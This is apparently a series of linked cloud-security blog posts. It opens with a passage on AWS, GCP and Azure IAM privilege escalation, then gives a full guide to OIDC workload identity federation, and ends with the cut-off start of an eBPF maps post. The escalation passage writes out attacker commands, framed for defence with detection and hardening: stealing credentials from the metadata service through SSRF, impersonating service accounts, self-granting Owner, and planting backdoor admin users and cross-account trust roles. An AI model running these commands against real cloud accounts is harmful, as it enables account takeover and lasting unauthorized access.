The Capital One path. Any SSRF vulnerability in a web application running on EC2 can retrieve the instance role’s credentials from the metadata service:

Attacker → SSRF → GET http://169.254.169.254/latest/meta-data/iam/security-credentials/
→ Returns role name
→ GET http://169.254.169.254/latest/meta-data/iam/security-credentials/MyAppRole
→ Returns: AccessKeyId, SecretAccessKey, Token (valid up to 6 hours)

Defence: IMDSv2 requires a PUT request first, blocking simple GET-based SSRF:

# Enforce IMDSv2 at instance launch
aws ec2 run-instances \
  --metadata-options HttpTokens=required,HttpPutResponseHopLimit=1

# Enforce org-wide via SCP
{
  "Effect": "Deny",
  "Action": "ec2:RunInstances",
  "Resource": "arn:aws:ec2:*:*:instance/*",
  "Condition": {
    "StringNotEquals": {"ec2:MetadataHttpTokens": "required"}
  }
}

High-Risk AWS Permissions Reference

Permission Why It’s Dangerous
iam:PassRole with Resource: * Assign any role to any service — enables immediate privilege escalation
iam:CreatePolicyVersion Rewrite any policy to grant anything — full account takeover in one API call
iam:AttachRolePolicy Attach AdministratorAccess to any role
iam:UpdateAssumeRolePolicy Add any principal to any role’s trust policy
iam:CreateAccessKey on other users Create persistent credentials for any IAM user
lambda:UpdateFunctionCode on privileged Lambda Inject malicious code into an elevated function
secretsmanager:GetSecretValue with Resource: * Read every secret in the account
ssm:GetParameter with Resource: * Read all Parameter Store values — often contains credentials
iam:CreateRole + iam:AttachRolePolicy Create and arm a backdoor role

GCP Privilege Escalation Paths

iam.serviceAccounts.actAs

GCP’s equivalent of iam:PassRole — and broader. Allows an identity to make any GCP service act as a specified service account:

# Attacker has iam.serviceAccounts.actAs on an admin SA
gcloud --impersonate-service-account=admin-sa@project.iam.gserviceaccount.com \
  iam roles list --project=my-project

# Generate a full access token and call any GCP API as admin-sa
gcloud auth print-access-token \
  --impersonate-service-account=admin-sa@project.iam.gserviceaccount.com

iam.serviceAccountKeys.create

Converts a short-lived identity into a persistent one. Create a key for an admin service account and you have indefinite access:

gcloud iam service-accounts keys create admin-key.json \
  [email protected]
# Valid until explicitly deleted — no expiry by default

# Block this at org level
gcloud org-policies set-policy --organization=ORG_ID - << 'EOF'
name: organizations/ORG_ID/policies/iam.disableServiceAccountKeyCreation
spec:
  rules:
    - enforce: true
EOF

Azure Privilege Escalation Paths

Microsoft.Authorization/roleAssignments/write

If an identity can write role assignments, it can grant itself Owner at any scope it can write to:

az role assignment create \
  --assignee [email protected] \
  --role "Owner" \
  --scope /subscriptions/SUB_ID

Managed Identity Assignment

Attach a high-privilege managed identity to a VM the attacker controls, then retrieve its token via IMDS:

az vm identity assign \
  --name attacker-vm --resource-group rg-attacker \
  --identities /subscriptions/SUB/resourcegroups/rg-prod/providers/\
Microsoft.ManagedIdentity/userAssignedIdentities/admin-identity

# From inside the VM
curl 'http://169.254.169.254/metadata/identity/oauth2/token\
?api-version=2018-02-01&resource=https://management.azure.com/' \
  -H 'Metadata: true'

Persistence — How Attackers Outlast Incident Response

# AWS: hidden IAM user with admin access
aws iam create-user --user-name svc-backup-01
aws iam attach-user-policy \
  --user-name svc-backup-01 \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam create-access-key --user-name svc-backup-01
# Valid until manually deleted — survives key rotation on other identities

# AWS: cross-account backdoor — hardest to find during IR
aws iam create-role --role-name svc-monitoring-role \
  --assume-role-policy-document '{
    "Principal": {"AWS": "arn:aws:iam::ATTACKER_ACCOUNT:root"},
    "Action": "sts:AssumeRole"
  }'
aws iam attach-role-policy --role-name svc-monitoring-role \
  --policy-arn arn:aws:iam::aws:policy/ReadOnlyAccess

# GCP: add personal account at org level — survives project deletion
gcloud organizations add-iam-policy-binding ORG_ID \
  --member="user:[email protected]" --role="roles/owner"

Cross-account backdoors are particularly resilient — incident responders often focus on the compromised account without auditing trust relationships with external accounts.


Detection — What to Alert On

Activity Event to Watch Priority
Role trust policy modified UpdateAssumeRolePolicy Critical
New IAM user created CreateUser High
Policy version created CreatePolicyVersion High
Policy attached to role AttachRolePolicy, PutRolePolicy High
SA key created (GCP) google.iam.admin.v1.CreateServiceAccountKey High
Role assignment at subscription scope (Azure) roleAssignments/write at /subscriptions/ Critical
CloudTrail logging disabled StopLogging, DeleteTrail Critical
GetSecretValue at unusual hours secretsmanager:GetSecretValue Medium

IAM events are low-volume in most accounts. That makes anomaly detection straightforward — a spike in IAM API calls outside business hours from an unusual principal is a strong signal. Configure the critical-priority events as real-time alerts, not just logged events.


⚠ Production Gotchas

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 1 — "We have SCPs, so individual role permissions       ║
║       don't matter as much"                                          ║
║                                                                      ║
║  SCPs set the ceiling. If an SCP allows iam:PassRole, any role      ║
║  with that permission can exploit it regardless of how "scoped"     ║
║  the SCP looks. SCPs and role-level permissions both need to be     ║
║  reviewed — they are independent layers.                            ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 2 — Permissions boundary doesn't stop iam:PassRole     ║
║                                                                      ║
║  A permissions boundary caps what a role can do directly. It does   ║
║  NOT prevent that role from passing a more powerful role to a       ║
║  Lambda or EC2. iam:PassRole escalation bypasses the boundary       ║
║  because the attacker is operating through the service, not         ║
║  directly through the bounded role.                                 ║
║                                                                      ║
║  Fix: scope iam:PassRole to specific ARNs regardless of whether     ║
║  a permissions boundary is in place.                                ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 3 — CloudTrail doesn't log data plane events by default ║
║                                                                      ║
║  S3 object reads (GetObject), Secrets Manager reads (GetSecretValue)║
║  and SSM GetParameter are data events — not logged by CloudTrail   ║
║  unless you explicitly enable Data Events. An attacker exfiltrating ║
║  data via these calls leaves no trace in a default CloudTrail       ║
║  configuration.                                                      ║
║                                                                      ║
║  Fix: enable S3 and Lambda data events in CloudTrail. At minimum    ║
║  enable logging for secretsmanager:GetSecretValue.                  ║
╚══════════════════════════════════════════════════════════════════════╝

Quick Reference

┌──────────────────────────────────┬──────────────────────────────────────────────────────┐
│ Permission                       │ Escalation Path                                      │
├──────────────────────────────────┼──────────────────────────────────────────────────────┤
│ iam:CreatePolicyVersion          │ Rewrite your own policy to grant *:*                 │
│ iam:PassRole (Resource: *)       │ Assign AdminRole to a Lambda/EC2 you control         │
│ iam:CreateRole+AttachRolePolicy  │ Create and arm a backdoor cross-account role         │
│ iam:UpdateAssumeRolePolicy       │ Hijack existing admin role's trust policy            │
│ iam.serviceAccounts.actAs (GCP)  │ Impersonate any service account including admins     │
│ iam.serviceAccountKeys.create    │ Generate permanent key for any SA                    │
│ roleAssignments/write (Azure)    │ Assign Owner to yourself at subscription scope       │
└──────────────────────────────────┴──────────────────────────────────────────────────────┘

Defensive commands:
┌────────────────────────────────────────────────────────────────────────────────────────┐
│  # AWS — find all roles with iam:PassRole on Resource: *                              │
│  aws iam list-policies --scope Local --query 'Policies[*].Arn' --output text | \     │
│    xargs -I{} aws iam get-policy-version \                                            │
│      --policy-arn {} --version-id v1 --query 'PolicyVersion.Document'                │
│                                                                                        │
│  # AWS — check who can assume a given role                                            │
│  aws iam get-role --role-name AdminRole \                                             │
│    --query 'Role.AssumeRolePolicyDocument'                                            │
│                                                                                        │
│  # AWS — simulate whether a principal can CreatePolicyVersion                        │
│  aws iam simulate-principal-policy \                                                  │
│    --policy-source-arn arn:aws:iam::ACCOUNT:role/DevRole \                           │
│    --action-names iam:CreatePolicyVersion \                                           │
│    --resource-arns arn:aws:iam::ACCOUNT:policy/DevPolicy                             │
│                                                                                        │
│  # GCP — check who has actAs on a service account                                    │
│  gcloud iam service-accounts get-iam-policy SA_EMAIL \                               │
│    --format=json | jq '.bindings[] | select(.role=="roles/iam.serviceAccountUser")'  │
│                                                                                        │
│  # GCP — list service account keys (find persistent backdoors)                       │
│  gcloud iam service-accounts keys list --iam-account=SA_EMAIL                        │
│                                                                                        │
│  # Azure — list all role assignments at subscription scope                           │
│  az role assignment list --scope /subscriptions/SUB_ID --output table                │
└────────────────────────────────────────────────────────────────────────────────────────┘

Framework Alignment

Framework Reference What It Covers Here
CISSP Domain 6 — Security Assessment and Testing IAM attack paths are the foundation of cloud penetration testing and access review methodology
CISSP Domain 5 — Identity and Access Management Defensive IAM design requires understanding offensive technique — you cannot protect paths you don’t know exist
ISO 27001:2022 8.8 Management of technical vulnerabilities IAM misconfigurations are technical vulnerabilities — identifying and remediating privilege escalation paths
ISO 27001:2022 8.16 Monitoring activities Detection signals and alerting on IAM mutations as part of continuous monitoring
SOC 2 CC7.1 Threat and vulnerability identification — this episode maps the threat model for cloud IAM
SOC 2 CC6.1 Understanding attack paths informs the design of logical access controls that actually hold

Key Takeaways

  • Cloud breaches are IAM events — the initial compromise is just the door; IAM misconfigurations determine how far an attacker can go
  • iam:PassRole with Resource: * is AWS’s highest-risk single permission — scope it to specific role ARNs or the escalation paths multiply
  • iam:CreatePolicyVersion and iam:UpdateAssumeRolePolicy are privilege escalation and persistence primitives — restrict them to dedicated admin roles
  • iam.serviceAccounts.actAs in GCP and roleAssignments/write in Azure are direct equivalents — same threat model, cloud-specific syntax
  • Enforce IMDSv2 on EC2; disable SA key creation org-wide in GCP; restrict role assignment scope in Azure
  • Enable CloudTrail Data Events — default logging misses S3 reads, Secrets Manager reads, and SSM GetParameter calls entirely
  • Alert on IAM mutations — low-volume, high-signal events that should never go unmonitored

What’s Next

You now know how attackers move through misconfigured IAM. AWS least privilege audit is the defensive counterpart — using Access Analyzer, GCP IAM Recommender, and Azure Access Reviews to find and right-size over-permissioned access before an attacker does. The goal: get from wildcard policies to scoped, auditable permissions without breaking production.

Next: AWS Least Privilege Audit: From Wildcard Permissions to Scoped Policies

Get EP09 in your inbox when it publishes → linuxcent.com/subscribe

OIDC Workload Identity: Eliminate Cloud Access Keys Entirely

Reading Time: 12 minutes

Meta Description: Replace static cloud credentials with OIDC workload identity — eliminate key rotation entirely for Lambda, GKE, and EKS workloads in production.


What Is Cloud IAMAuthentication vs AuthorizationIAM Roles vs PoliciesAWS IAM Deep DiveGCP Resource Hierarchy IAMAzure RBAC ScopesOIDC Workload Identity


TL;DR

  • Workload identity federation replaces static cloud access keys with short-lived tokens tied to runtime identity — no key to rotate, no secret to leak
  • The OIDC token exchange pattern is consistent across AWS (IRSA / Pod Identity), GCP (Workload Identity), and Azure (AKS Workload Identity) — learn one, translate the others
  • AWS EKS: use Pod Identity for new clusters; IRSA is the pattern for existing ones — both eliminate static keys
  • GCP GKE: --workload-pool at cluster level + roles/iam.workloadIdentityUser binding on the GCP service account
  • Azure AKS: federated credential on a managed identity + azure.workload.identity/use: "true" pod label
  • Cross-cloud federation works: an AWS IAM role can call GCP APIs without a GCP key file on the AWS side
  • Enforce IMDSv2 everywhere; pin OIDC trust conditions to specific service account names; give each workload its own identity

The Big Picture

  WORKLOAD IDENTITY FEDERATION — BEFORE AND AFTER

  ── STATIC CREDENTIALS (the broken model) ────────────────────────────────

  IAM user created → access key generated
         ↓
  Key distributed to pods / CI / servers → stored in Secrets, env vars, .env
         ↓
  Valid indefinitely — never expires on its own
         ↓
  Rotation is manual, painful, deferred ("there's a ticket for that")
         ↓
  Key proliferates across environments — you lose track of every copy
         ↓
  Leaked key → unlimited blast radius until someone notices and revokes it

  ── WORKLOAD IDENTITY FEDERATION (the current model) ─────────────────────

  No key created. No key distributed. No key to rotate.

  Workload starts → requests signed JWT from its native IdP
         │           (EKS OIDC issuer, GitHub Actions, GKE metadata server)
         ↓
  JWT carries workload claims: namespace, service account, repo, instance ID
         ↓
  Cloud STS / token endpoint validates JWT signature + trust conditions
         ↓
  Short-lived credential issued  (AWS STS: 1–12h  |  GCP/Azure: ~1h)
         ↓
  Credential expires automatically — nothing to clean up
         ↓
  Token stolen → usable for 1 hour maximum, audience-bound, not reusable

Workload identity federation is the architectural answer to static credential sprawl. The workload’s proof of identity is its runtime environment — the cluster it runs in, the repository it belongs to, the service account it uses. The cloud provider never issues a persistent secret. This episode covers how that exchange works across all three clouds and Kubernetes.


Introduction

Workload identity federation eliminates static cloud credentials by replacing them with short-lived tokens that the runtime environment generates and the cloud provider validates against a registered trust relationship. No key to distribute, no rotation schedule to maintain, no proliferation to track.

A while back I was reviewing a Kubernetes cluster that had been running in production for about two years. The team had done good work — solid app code, reasonable cluster configuration. But when I started looking at how pods were authenticating to AWS, I found what I find in roughly 60% of environments I look at.

Twelve service accounts. Twelve access key pairs. Keys created 6 to 24 months ago. Stored as Kubernetes Secrets. Mounted into pods as environment variables. Never rotated because “the app would need to be restarted” and nobody owned the rotation schedule. Two of the keys belonged to AWS IAM users who no longer worked at the company — the users had been deactivated, but the access keys were still valid because in AWS, access keys live independently of console login status.

When I asked who was responsible for rotating these, the answer I got was: “There’s a ticket for that.”

There’s always a ticket for that.

The engineering problem here isn’t that the team was careless. It’s that static credentials are fundamentally unmanageable at scale. Workload identity removes the problem at its root.


Why Static Credentials Are the Wrong Model for Machines

Before getting into solutions, let me be precise about why this is a security problem, not just an operational inconvenience.

Static credentials have four fundamental failure modes:

They don’t expire. An AWS access key created in 2022 is valid in 2026 unless someone explicitly rotates it. GitGuardian’s 2024 data puts the average time from secret creation to detection at 328 days. That’s almost a year of exposure window before anyone even knows.

They lose origin context. When an API call arrives at AWS with an access key, the authorization system can tell you what key was used — not whether it was used by your Lambda function, by a developer debugging something, or by an attacker using a stolen copy. Static credentials are context-blind.

They proliferate invisibly. One key, distributed to a team, copied into three environments, cached on developer laptops, stored in a CI/CD pipeline, pasted into a config file in a test environment that got committed. By the time you need to rotate it, you don’t know all the places it lives.

Rotation is operationally painful. Creating a new key, updating every place the old key lives, removing the old key — while ensuring nothing breaks during the transition — is a coordination exercise that organizations consistently defer. Every month the rotation doesn’t happen is another month of accumulated risk.

Workload identity solves all four by replacing persistent credentials with short-lived tokens that are generated from the runtime environment and verified by the cloud provider against a registered trust relationship.


The OIDC Exchange — What’s Actually Happening

All three major cloud providers have converged on the same underlying mechanism: OIDC token exchange.

Workload (pod, GitHub Actions runner, EC2 instance, on-prem server)
    │
    │  1. Request a signed JWT from the native identity provider
    │     (EKS OIDC server, GitHub's token.actions.githubusercontent.com,
    │      GKE metadata server, Azure IMDS)
    ▼
Native IdP issues a JWT. It contains claims about the workload:
    - What repository triggered this CI run
    - What Kubernetes namespace and service account this pod uses
    - What EC2 instance ID this request came from
    │
    │  2. Workload presents the JWT to the cloud STS / federation endpoint
    ▼
Cloud IAM evaluates:
    - Is the JWT signature valid? (verified against the IdP's public keys)
    - Does the issuer match a registered trust relationship?
    - Do the claims match the conditions in the trust policy?
    │
    │  3. If all checks pass: short-lived cloud credentials issued
    │     (AWS: temporary STS credentials, expiry 1-12 hours)
    │     (GCP: OAuth2 access token, expiry ~1 hour)
    │     (Azure: access token, expiry ~1 hour)
    ▼
Workload calls cloud API with short-lived credentials.
Credentials expire. Nothing to clean up. Nothing to rotate.

No static secret is stored anywhere. The workload’s identity is its runtime environment — the cluster it runs in, the repository it belongs to, the service account it uses. If someone steals the short-lived token, it expires in an hour. If someone tries to use a token for a different resource than it was issued for, the audience claim doesn’t match and it’s rejected.


AWS: IRSA and Pod Identity for EKS

IRSA — The Original Pattern

IRSA (IAM Roles for Service Accounts) federates a Kubernetes service account identity with an AWS IAM role. Each pod’s service account is the proof of identity; AWS issues temporary credentials in exchange for the OIDC JWT.

# Step 1: get the OIDC issuer URL for your EKS cluster
OIDC_ISSUER=$(aws eks describe-cluster \
  --name my-cluster \
  --query "cluster.identity.oidc.issuer" \
  --output text)

# Step 2: register this OIDC issuer with IAM
aws iam create-open-id-connect-provider \
  --url "${OIDC_ISSUER}" \
  --client-id-list sts.amazonaws.com \
  --thumbprint-list "$(openssl s_client -connect ${OIDC_ISSUER#https://}:443 2>/dev/null \
    | openssl x509 -fingerprint -noout | cut -d= -f2 | tr -d ':')"

# Step 3: create an IAM role with a trust policy scoped to a specific service account
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
OIDC_ID="${OIDC_ISSUER#https://}"

cat > irsa-trust.json << EOF
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {
      "Federated": "arn:aws:iam::${ACCOUNT_ID}:oidc-provider/${OIDC_ID}"
    },
    "Action": "sts:AssumeRoleWithWebIdentity",
    "Condition": {
      "StringEquals": {
        "${OIDC_ID}:sub": "system:serviceaccount:production:app-backend",
        "${OIDC_ID}:aud": "sts.amazonaws.com"
      }
    }
  }]
}
EOF

aws iam create-role \
  --role-name app-backend-s3-role \
  --assume-role-policy-document file://irsa-trust.json

aws iam put-role-policy \
  --role-name app-backend-s3-role \
  --policy-name AppBackendPolicy \
  --policy-document file://app-backend-policy.json
# Step 4: annotate the Kubernetes service account with the role ARN
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::123456789012:role/app-backend-s3-role

The EKS Pod Identity webhook injects two environment variables into any pod using this service account: AWS_WEB_IDENTITY_TOKEN_FILE pointing to a projected token, and AWS_ROLE_ARN. The AWS SDK reads these automatically. The application doesn’t know any of this is happening — it just calls S3 and it works, using credentials that were never stored anywhere and expire automatically.

The trust policy’s sub condition is the security boundary. system:serviceaccount:production:app-backend means: only pods in the production namespace using the app-backend service account can assume this role. A pod in a different namespace, even with the same service account name, gets a different sub claim and the assumption fails.

EKS Pod Identity — The Simpler Modern Approach

AWS released Pod Identity as a simpler alternative to IRSA. No OIDC provider setup, no manual trust policy with OIDC conditions:

# Enable the Pod Identity agent addon on the cluster
aws eks create-addon \
  --cluster-name my-cluster \
  --addon-name eks-pod-identity-agent

# Create the association — this replaces the OIDC trust policy setup
aws eks create-pod-identity-association \
  --cluster-name my-cluster \
  --namespace production \
  --service-account app-backend \
  --role-arn arn:aws:iam::123456789012:role/app-backend-s3-role

Same result, less ceremony. For new clusters, Pod Identity is the path I’d recommend. IRSA remains important to understand for the many existing clusters already using it.

IAM Roles Anywhere — For On-Premises Workloads

Not everything runs in Kubernetes. For on-premises servers and workloads outside AWS, IAM Roles Anywhere issues temporary credentials to servers that present an X.509 certificate signed by a trusted CA:

# Register your internal CA as a trust anchor
aws rolesanywhere create-trust-anchor \
  --name "OnPremCA" \
  --source sourceType=CERTIFICATE_BUNDLE,sourceData.x509CertificateData="$(base64 -w0 ca-cert.pem)"

# Create a profile mapping the CA to allowed roles
aws rolesanywhere create-profile \
  --name "OnPremServers" \
  --role-arns "arn:aws:iam::123456789012:role/OnPremAppRole" \
  --trust-anchor-arns "${TRUST_ANCHOR_ARN}"

# On the on-prem server — exchange the certificate for AWS credentials
aws_signing_helper credential-process \
  --certificate /etc/pki/server.crt \
  --private-key /etc/pki/server.key \
  --trust-anchor-arn "${TRUST_ANCHOR_ARN}" \
  --profile-arn "${PROFILE_ARN}" \
  --role-arn "arn:aws:iam::123456789012:role/OnPremAppRole"

The server’s certificate (managed by your internal PKI or an ACM Private CA) is the proof of identity. No access key distributed to the server — just a certificate that your CA signed and that you can revoke through your existing certificate revocation infrastructure.


GCP: Workload Identity for GKE

For GKE clusters, Workload Identity is enabled at the cluster level and creates a bridge between Kubernetes service accounts and GCP service accounts:

# Enable Workload Identity on the cluster
gcloud container clusters update my-cluster \
  --workload-pool=my-project.svc.id.goog

# Enable on the node pool (required for the metadata server to work)
gcloud container node-pools update default-pool \
  --cluster=my-cluster \
  --workload-metadata=GKE_METADATA

# Create the GCP service account for the workload
gcloud iam service-accounts create app-backend \
  --project=my-project

SA_EMAIL="[email protected]"

# Grant the GCP SA the permissions it needs
gcloud storage buckets add-iam-policy-binding gs://app-data \
  --member="serviceAccount:${SA_EMAIL}" \
  --role="roles/storage.objectViewer"

# Create the trust relationship: K8s SA → GCP SA
gcloud iam service-accounts add-iam-policy-binding "${SA_EMAIL}" \
  --role=roles/iam.workloadIdentityUser \
  --member="serviceAccount:my-project.svc.id.goog[production/app-backend]"
# Annotate the Kubernetes service account
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    iam.gke.io/gcp-service-account: [email protected]

When the pod makes a GCP API call using ADC (Application Default Credentials), the GKE metadata server intercepts the credential request. It validates the pod’s Kubernetes identity, checks the IAM binding, and returns a short-lived GCP access token. The GCP service account key file never exists. There’s nothing to protect, nothing to rotate, nothing to leak.


Azure: Workload Identity for AKS

Azure’s workload identity for Kubernetes replaced the older AAD Pod Identity approach — which required a DaemonSet, had known TOCTOU vulnerabilities, and was operationally fragile. The current implementation uses the OIDC pattern:

# Enable OIDC issuer and workload identity on the AKS cluster
az aks update \
  --name my-aks \
  --resource-group rg-prod \
  --enable-oidc-issuer \
  --enable-workload-identity

# Get the OIDC issuer URL for this cluster
OIDC_ISSUER=$(az aks show \
  --name my-aks --resource-group rg-prod \
  --query "oidcIssuerProfile.issuerUrl" -o tsv)

# Create a user-assigned managed identity for the workload
az identity create --name app-backend-identity --resource-group rg-identities
CLIENT_ID=$(az identity show --name app-backend-identity -g rg-identities --query clientId -o tsv)
PRINCIPAL_ID=$(az identity show --name app-backend-identity -g rg-identities --query principalId -o tsv)

# Grant the identity the access it needs
az role assignment create \
  --assignee-object-id "$PRINCIPAL_ID" \
  --role "Storage Blob Data Reader" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/appstore

# Federate: trust the K8s service account from this cluster
az identity federated-credential create \
  --name aks-app-backend-binding \
  --identity-name app-backend-identity \
  --resource-group rg-identities \
  --issuer "${OIDC_ISSUER}" \
  --subject "system:serviceaccount:production:app-backend" \
  --audience "api://AzureADTokenExchange"
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    azure.workload.identity/client-id: "CLIENT_ID_HERE"
---
apiVersion: v1
kind: Pod
metadata:
  labels:
    azure.workload.identity/use: "true"   # triggers token injection
spec:
  serviceAccountName: app-backend
  containers:
  - name: app
    image: my-app:latest
    # Azure SDK DefaultAzureCredential picks up the injected token automatically

Cross-Cloud Federation — When AWS Talks to GCP

The same OIDC mechanism works cross-cloud. An AWS Lambda or EC2 instance can call GCP APIs without any GCP service account key on the AWS side:

# GCP side: create a workload identity pool that trusts AWS
gcloud iam workload-identity-pools create "aws-workloads" --location=global

gcloud iam workload-identity-pools providers create-aws "aws-provider" \
  --workload-identity-pool="aws-workloads" \
  --account-id="AWS_ACCOUNT_ID"

# Bind the specific AWS role to the GCP service account
gcloud iam service-accounts add-iam-policy-binding [email protected] \
  --role=roles/iam.workloadIdentityUser \
  --member="principalSet://iam.googleapis.com/projects/GCP_PROJ_NUM/locations/global/workloadIdentityPools/aws-workloads/attribute.aws_role/arn:aws:sts::AWS_ACCOUNT:assumed-role/MyAWSRole"

The AWS workload presents its STS-issued credentials to GCP’s token exchange endpoint. GCP verifies the AWS signature, checks the attribute mapping (only MyAWSRole from that AWS account), and issues a short-lived GCP access token. No GCP service account key is ever distributed to the AWS side.


The Threat Model — What Workload Identity Doesn’t Solve

Workload identity dramatically reduces the attack surface, but it doesn’t eliminate it:

Threat What Still Applies Mitigation
Token theft from the container filesystem The projected token is readable if you have container filesystem access Short TTL (default 1h); tokens are audience-bound — can’t use a K8s token to call Azure APIs
SSRF to metadata service An SSRF vulnerability can fetch credentials from the metadata endpoint Enforce IMDSv2 on AWS; use metadata server restrictions on GKE/AKS
Overpermissioned service account Workload identity doesn’t enforce least privilege — the SA can still be over-granted One SA per workload; review permissions against actual usage
Trust policy too broad OIDC trust policy allows any service account in a namespace Always pin to specific SA name in the sub condition

The SSRF-to-metadata-service path deserves particular attention. IMDSv2 (mandatory in AWS by requiring a PUT to get a token before any metadata request) blocks most SSRF scenarios because a simple SSRF can only make GET requests. Enforce it:

# Enforce IMDSv2 at instance launch
aws ec2 run-instances \
  --metadata-options HttpTokens=required,HttpPutResponseHopLimit=1

# Enforce org-wide via SCP — no instance can launch without IMDSv2
{
  "Effect": "Deny",
  "Action": "ec2:RunInstances",
  "Resource": "arn:aws:ec2:*:*:instance/*",
  "Condition": {
    "StringNotEquals": {
      "ec2:MetadataHttpTokens": "required"
    }
  }
}

⚠ Production Gotchas

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 1 — Trust policy scoped to namespace, not service account ║
║                                                                      ║
║  A condition like "sub": "system:serviceaccount:production:*"        ║
║  grants any pod in the production namespace the ability to assume    ║
║  the role. A compromised or new workload in that namespace gets      ║
║  access automatically.                                               ║
║                                                                      ║
║  Fix: always pin the sub condition to the exact service account      ║
║  name. "system:serviceaccount:production:app-backend" — not a glob.  ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 2 — Shared service accounts across workloads             ║
║                                                                      ║
║  Reusing one service account for multiple workloads saves setup      ║
║  time and creates a lateral movement path. A compromised workload    ║
║  that shares a service account with a payment processor has payment  ║
║  processor permissions.                                              ║
║                                                                      ║
║  Fix: one service account per workload. The overhead is low.         ║
║  The blast radius reduction is significant.                          ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 3 — IMDSv1 still reachable after enabling IMDSv2        ║
║                                                                      ║
║  Enabling IMDSv2 on new instances doesn't affect existing ones.      ║
║  The SCP approach enforces it at the org level going forward, but    ║
║  existing instances need explicit remediation.                       ║
║                                                                      ║
║  Fix: audit existing instances for IMDSv1 exposure.                 ║
║  aws ec2 describe-instances --query                                  ║
║    "Reservations[].Instances[?MetadataOptions.HttpTokens!='required']║
║    .[InstanceId,Tags]"                                               ║
╚══════════════════════════════════════════════════════════════════════╝

Quick Reference

┌────────────────────────────────┬───────────────────────────────────────────────────────┐
│ Term                           │ What it means                                         │
├────────────────────────────────┼───────────────────────────────────────────────────────┤
│ Workload identity federation   │ OIDC-based exchange: runtime JWT → short-lived token  │
│ IRSA                           │ IAM Roles for Service Accounts — EKS + OIDC pattern   │
│ EKS Pod Identity               │ Newer, simpler IRSA replacement — no OIDC setup       │
│ GKE Workload Identity          │ K8s SA → GCP SA via workload pool + IAM binding       │
│ AKS Workload Identity          │ K8s SA → managed identity via federated credential    │
│ IAM Roles Anywhere             │ AWS temp credentials for on-prem via X.509 cert       │
│ IMDSv2                         │ Token-gated AWS metadata service — blocks SSRF        │
│ OIDC sub claim                 │ Workload's unique identity string — use for pinning   │
│ Projected service account token│ K8s-injected JWT — the OIDC token pods present to AWS │
└────────────────────────────────┴───────────────────────────────────────────────────────┘

Key commands:
┌────────────────────────────────────────────────────────────────────────────────────────┐
│  # AWS — list OIDC providers registered in this account                               │
│  aws iam list-open-id-connect-providers                                               │
│                                                                                        │
│  # AWS — list Pod Identity associations for a cluster                                 │
│  aws eks list-pod-identity-associations --cluster-name my-cluster                     │
│                                                                                        │
│  # AWS — verify what credentials a pod is actually using                              │
│  aws sts get-caller-identity   # run from inside the pod                              │
│                                                                                        │
│  # AWS — audit instances missing IMDSv2                                               │
│  aws ec2 describe-instances \                                                          │
│    --query "Reservations[].Instances[?MetadataOptions.HttpTokens!='required']          │
│    .[InstanceId]" --output text                                                        │
│                                                                                        │
│  # GCP — verify workload identity binding on a GCP service account                   │
│  gcloud iam service-accounts get-iam-policy SA_EMAIL                                  │
│                                                                                        │
│  # GCP — list workload identity pools                                                 │
│  gcloud iam workload-identity-pools list --location=global                            │
│                                                                                        │
│  # Azure — list federated credentials on a managed identity                           │
│  az identity federated-credential list \                                               │
│    --identity-name app-backend-identity --resource-group rg-identities                │
└────────────────────────────────────────────────────────────────────────────────────────┘

Framework Alignment

Framework Reference What It Covers Here
CISSP Domain 5 — Identity and Access Management Non-human identities dominate cloud environments; workload identity federation is the modern machine authentication pattern
CISSP Domain 1 — Security & Risk Management Static credential sprawl is a measurable, eliminable risk; workload identity removes it at the root
ISO 27001:2022 5.17 Authentication information Managing machine credentials — workload identity replaces long-lived secrets with short-lived, environment-bound tokens
ISO 27001:2022 8.5 Secure authentication OIDC token exchange is the secure authentication mechanism for machine identities
ISO 27001:2022 5.18 Access rights Service account provisioning and deprovisioning — workload identity ties access to the runtime environment, not a stored secret
SOC 2 CC6.1 Workload identity federation is the preferred technical control for machine-to-cloud authentication in CC6.1
SOC 2 CC6.7 Short-lived, audience-bound tokens restrict credential reuse across systems — addresses transmission and access controls

Key Takeaways

  • Static credentials for machine identities are the problem, not the solution — workload identity federation eliminates them at the root
  • The OIDC token exchange pattern is consistent across AWS (IRSA/Pod Identity), GCP (Workload Identity), and Azure (AKS Workload Identity) — learn one, the others are a translation
  • AWS EKS: use Pod Identity for new clusters; IRSA remains the pattern for existing ones — both eliminate static keys
  • GCP GKE: Workload Identity enabled at cluster level, SA annotation at the K8s service account level
  • Azure AKS: federated credential on the managed identity, azure.workload.identity/use: "true" label on pods
  • Cross-cloud federation works — an AWS IAM role can call GCP APIs without a GCP key file
  • Enforce IMDSv2 everywhere; pin OIDC trust conditions to specific service account names; apply least privilege to the underlying cloud identity

What’s Next

You’ve eliminated the static credential problem. The next question is: what happens when the IAM configuration itself is the vulnerability? AWS IAM privilege escalation goes into the attack paths — how iam:PassRole, iam:CreateAccessKey, and misconfigured trust policies turn IAM misconfigurations into full account compromise. If you’re designing or auditing cloud access control, you need to know these paths before an attacker finds them.

Next: AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise

Get EP08 in your inbox when it publishes → linuxcent.com/subscribe

eBPF Maps — The Persistent Data Layer Between Kernel and Userspace

Reading Time: 11 minutes

eBPF: From Kernel to Cloud, Episode 5
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps**


TL;DR

  • eBPF programs are stateless — maps are where all state lives, between invocations and between kernel and userspace
